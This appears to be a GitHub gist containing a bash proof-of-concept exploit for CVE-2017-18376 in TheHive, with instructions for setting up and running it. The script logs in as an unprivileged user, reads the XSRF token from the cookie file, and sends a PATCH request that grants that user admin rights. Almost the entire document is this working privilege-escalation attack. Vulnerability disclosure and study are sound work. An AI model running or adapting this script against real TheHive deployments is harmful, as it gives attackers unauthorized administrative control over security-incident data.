Created
June 19, 2019 09:25
-
-
Save RaJiska/c1b4521aefd77ed43b06045ca05e2591 to your computer and use it in GitHub Desktop.
Exploit for CVE-2017-18376
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| # Author: | |
| # Doriann "Ra'Jiska" Corlouër | |
| # Description: | |
| # Exploit POC for CVE-2017-18376 - https://nvd.nist.gov/vuln/detail/CVE-2017-18376 | |
| # This POC allow a TheHive user with minimal rights (read, read / write) to gain admin rights (privilege escalation) | |
| # Setup: | |
| # Edit the following variables: | |
| # - THEHIVE_ROOT_URL => The URL of your TheHive instance | |
| # - USERNAME => The username of your unprivileged account | |
| # - PASSWORD => The password of your unprivileged account | |
| # Execution: | |
| # $ bash thehiveprivesc.sh | |
| THEHIVE_ROOT_URL="https://somelink.com/thehive" | |
| USERNAME="username" | |
| PASSWORD="password" | |
| COOKIE="$(/bin/mktemp --suffix=_thehivecookie)" | |
| CURL="/usr/bin/curl -v -c $COOKIE -b $COOKIE" | |
| $CURL $THEHIVE_ROOT_URL # Retrieve CSRF | |
| $CURL $THEHIVE_ROOT_URL/api/login --data "{\"user\":\"$USERNAME\",\"password\":\"$PASSWORD\"}" -H 'Content-Type: application/json;charset=utf-8' | |
| XSRF_TOKEN=$(/bin/cat $COOKIE |/bin/grep 'XSRF-TOKEN' |/usr/bin/awk {'$1=$2=$3=$4=$5=$6=""; print $0'} |/usr/bin/awk {'print $1'}) # Retrieve saved CSRF for header | |
| $CURL -X PATCH $THEHIVE_ROOT_URL/api/user/$USERNAME --data '{"roles":["read","write","admin"]}' -H "X-XSRF-TOKEN: $XSRF_TOKEN" -H 'Content-Type: application/json;charset=utf-8' | |
| /bin/rm -f $COOKIE |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment